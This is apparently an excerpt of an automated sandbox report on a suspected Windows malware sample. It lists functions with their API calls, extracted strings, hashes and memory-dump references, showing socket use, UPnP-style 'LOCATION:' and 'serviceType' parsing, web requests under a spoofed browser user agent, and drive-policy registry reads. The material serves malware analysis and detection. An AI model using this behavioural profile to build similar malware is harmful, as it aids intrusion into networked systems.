                                                                                                                                                                                                      • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                                      Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 671207744-0
                                                                                                                                                                                                      • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                      Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                      • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                      • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                      • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleeprecvfrom
                                                                                                                                                                                                      • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                      • API String ID: 668330359-3973262388
                                                                                                                                                                                                      • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                                      Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                      • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                      • API String ID: 2743515581-2960703779
                                                                                                                                                                                                      • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                                      Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                                      Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                      • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                                      • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                                      Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                                      Function 0040B530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 442028454-3424199868
                                                                                                                                                                                                      • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                                      • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                                                                                      Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                      • String ID: %s%s
                                                                                                                                                                                                      • API String ID: 1447977647-3252725368
                                                                                                                                                                                                      • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                                      • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                                      Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                                      • NoDrives, xrefs: 00406458
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                      • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                      • API String ID: 2666887985-3471754645
                                                                                                                                                                                                      • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                                      Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2251373460-0
                                                                                                                                                                                                      • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                                      Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3488799664-0
                                                                                                                                                                                                      • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                                      • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                                      Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
